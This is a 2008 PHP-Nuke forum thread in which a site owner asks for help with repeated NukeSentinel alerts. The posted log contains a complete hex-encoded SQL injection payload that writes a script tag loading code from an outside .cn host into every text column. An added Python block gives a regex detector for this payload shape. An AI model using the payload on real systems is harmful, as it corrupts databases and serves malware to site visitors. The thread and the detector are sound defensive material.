Ravens PHP Scripts: Forums
 

 

Misha
Worker



Joined: Jul 30, 2006
Posts: 205
Location: McLean, VA

Posted: Mon Aug 25, 2008 10:25 am

For the last week or so I keep getting several messages daily from Nuke Sentinel, all looking like this (with different IPs of course :) ):

Code:
Created By: NukeSentinel(tm) 2.6.01

Date & Time: 2008-08-25 06:59:43 MDT GMT -0600
Blocked IP: 92.227.187.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)
HTTP Host: [ Only registered users can see links on this board! Get registered or login! ]
Script Name: /index.php
Qu ery String: ;D ECLARE @S CHA R(4000);S ET @S=C AST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CH AR(4000));EXEC(@S);
Get String: ;DEC LARE_@S_CH AR(4000);SET_@S=CA ST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CH AR(4000));E XEC(@S);
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 92.227.187.23
Remote Port: 4063
Request Method: GET
--------------------
Who-Is for IP

Is there anything else I can do to stop it, other than just reading those notifications?

Of course there is always something of that kind happening from time to time, but this time it seems to be pretty consistent and persistent, and I am kinda starting to worry that those guys finally manage to find a way in. I just got another notification, as I am typing this :(

Thanks a bunch, Misha

_________________
http://www.funandsafedriving.com/defensive-driving.html 
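A way to triage alerts like the one quoted in the post above, as an added example that is not part of the original thread and is not NukeSentinel code: it recognises the DECLARE / CAST(0x...) / EXEC shape in a logged query string, in both the space-separated "Query String" form and the underscore-separated "Get String" form, and groups source addresses by payload hash without decoding the payload. The function names, the documentation-range addresses and the short hex value are constructed for illustration.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Shape: DECLARE @v CHAR(n); SET @v = CAST(0x<hex> AS CHAR(n)); EXEC(@v)
SIG = re.compile(
    r"DECLARE\s+@(?P<var>\w+)\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*;\s*"
    r"SET\s+@(?P=var)\s*=\s*CAST\s*\(\s*0x(?P<hex>[0-9A-F]+)\s+AS\s+"
    r"N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)\s*;\s*EXEC\s*\(\s*@(?P=var)\s*\)",
    re.IGNORECASE,
)

def find_injection(query_string):
    """Return (variable, payload_bytes, payload_sha256) or None."""
    # Undo URL encoding, then treat '_' as a separator: the "Get String"
    # field of the alert shows underscores where the request had spaces.
    text = unquote_plus(query_string).replace("_", " ")
    m = SIG.search(text)
    if not m:
        return None
    blob = m.group("hex").upper()  # hash the hex text; the payload is never decoded
    return m.group("var"), len(blob) // 2, hashlib.sha256(blob.encode()).hexdigest()

def group_by_payload(alerts):
    """alerts: iterable of (remote_addr, query_string) -> {sha256: [addresses]}."""
    campaigns = defaultdict(set)
    for addr, qs in alerts:
        hit = find_injection(qs)
        if hit:
            campaigns[hit[2]].add(addr)
    return {h: sorted(addrs) for h, addrs in campaigns.items()}

# Constructed sample alerts; the hex value is a short harmless placeholder.
HEX = "53454C4543542031"
SAMPLE_ALERTS = [
    ("192.0.2.10", f";DECLARE @S CHAR(4000);SET @S=CAST(0x{HEX} AS CHAR(4000));EXEC(@S);"),
    ("198.51.100.7", f";DECLARE_@S_CHAR(4000);SET_@S=CAST(0x{HEX}_AS_CHAR(4000));EXEC(@S);"),
    ("203.0.113.5", f";DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x{HEX.lower()}%20AS%20CHAR(4000));EXEC(@S);"),
    ("192.0.2.99", "name=News&file=article&sid=12"),
]

if __name__ == "__main__":
    for digest, sources in group_by_payload(SAMPLE_ALERTS).items():
        print(digest[:16], len(sources), "sources:", ", ".join(sources))
```

A single hash shared by many source addresses points to one automated campaign rather than separate attackers.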
jakec
Site Admin



Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

Posted: Mon Aug 25, 2008 10:39 am

See this post here: [ Only registered users can see links on this board! Get registered or login! ]
 
Misha







Posted: Mon Aug 25, 2008 10:45 am

Thanks Jake, this clears it up nicely :)
 
All times are GMT - 6 Hours
 